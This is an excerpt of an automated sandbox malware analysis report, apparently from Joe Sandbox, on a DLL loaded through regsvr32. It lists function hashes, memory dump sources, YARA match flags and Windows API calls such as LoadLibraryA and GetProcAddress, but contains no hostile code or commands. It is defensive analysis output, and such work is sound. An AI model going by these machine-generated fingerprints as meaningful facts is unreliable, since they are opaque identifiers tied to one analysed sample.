                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1583075380-0
                                                                                                                                      • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                                      • Instruction ID: ad47b573d9151c600ab11274eede75c78c80d7bf853c907d14b5861c2f5930b5
                                                                                                                                      • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                                      • Instruction Fuzzy Hash: 92A1A262B1C695C2DB649F2696697AFA762FF84BC8F448535DE4D1BB49CE3CE001C320
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                                      • Instruction ID: fcaa2a63b6f973e30e7fb6b12d48ad43b4cb073385fdeeb6c34344bef8894b7f
                                                                                                                                      • Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                                      • Instruction Fuzzy Hash: 1E71F672F1C15ACBD31CDB19D8656786796FBE4308F588835D60E8AB94EE39F940C720
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                                      • Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
                                                                                                                                      • Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                                      • Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                                                                                      • Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
                                                                                                                                      • Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                                                                                      • Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                                      • Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
                                                                                                                                      • Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                                      • Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                                      • Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
                                                                                                                                      • Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                                      • Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                                                                                      • Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
                                                                                                                                      • Opcode Fuzzy Hash: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                                                                                      • Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                                      • Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
                                                                                                                                      • Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                                      • Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                                      • Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
                                                                                                                                      • Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                                      • Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                                      • Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
                                                                                                                                      • Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                                      • Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                                      • Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
                                                                                                                                      • Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                                      • Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                                      • Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
                                                                                                                                      • Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                                      • Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                                                                                      • Instruction ID: 5a85513126e01a98bb902dccfe4af02f6196fd3989a765a33a65cbdcda0cb452
                                                                                                                                      • Opcode Fuzzy Hash: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                                                                                      • Instruction Fuzzy Hash: 0641E5B091038A8FCF88DF64D84A5DE7BB0FB58358F104A1DFC65A6250E3B49664CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                                      • Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
                                                                                                                                      • Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                                      • Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3186804695-0
                                                                                                                                      • Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                                      • Instruction ID: 2e1c3ca0d7397628510e6c8f9747096c2113370c39df8bf855b309567eeba3b0
                                                                                                                                      • Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                                      • Instruction Fuzzy Hash: 3E31C122A18699C5EB44DB2AD42D3AA67A1FF84BC8F484536EA4D07796DE3CD001C320
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                                      • Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
                                                                                                                                      • Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                                      • Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                                                                                      • Instruction ID: 4854a602bbf38c78d9fab67e5db6ce586c5dff59e36b89151347ba9907d49bba
                                                                                                                                      • Opcode Fuzzy Hash: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                                                                                      • Instruction Fuzzy Hash: D13189B0529781ABD78CDF28C49981EBBE1FBC8344FC46A2DF9868B350D7749405CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                                      • Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
                                                                                                                                      • Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                                      • Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                                      • Instruction ID: 3e7ffcddda8d873ed620f17f9684606eb13d1dd5f0b21141b7977a2e64531d07
                                                                                                                                      • Opcode Fuzzy Hash: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                                      • Instruction Fuzzy Hash: AF217F74529780AFC788DF29C08981EBBE1FB99748F806A1DF88697354D375D445CF42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                                      • Instruction ID: 85e8bde3e512593198615bb83ad7c533a741442781c438c8658c5734f088230b
                                                                                                                                      • Opcode Fuzzy Hash: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                                      • Instruction Fuzzy Hash: AA2148B4508384CBD349DF29D05951BBBE0BB8D75CF900B1DF4CAAB264D7789644CB0A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                                      • Instruction ID: cb3a07774fb09d7bec151804a9501dd67b802bcd534e5dea3a88175996b4459c
                                                                                                                                      • Opcode Fuzzy Hash: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                                      • Instruction Fuzzy Hash: 5CB09B6570C758C54765870754145155792F7ADBD46044134AD0D53B54DD3C97408750
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1012874770-0
                                                                                                                                      • Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                                                                                      • Instruction ID: f1f4f0fd0f76d5f101b410aa9cbad8059e22e0c104d73a1874b716ce8eedb19e
                                                                                                                                      • Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                                                                                      • Instruction Fuzzy Hash: F341A522A1A499C1EE64EB33D4656BC5362FF84B48F046835DB4D4B1A7CE15D845C370
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D0F5
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D111
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D139
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D142
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D158
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D161
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D177
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D180
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D19E
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D1A7
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D1D9
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D1E8
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D240
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D260
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D279
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                      • API String ID: 3085332118-232180764
                                                                                                                                      • Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                                                                                      • Instruction ID: 5b309b6b8da2db68235620c9d1c426b832ad829dbaf5679fbcbd5130476ad77e
                                                                                                                                      • Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                                                                                      • Instruction Fuzzy Hash: C2510960A0EB6EC5FD64DB63A8681746390BF85B88F550935DD4E037A2EF3CE585C230
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFC672107CE), ref: 00007FFC672102F9
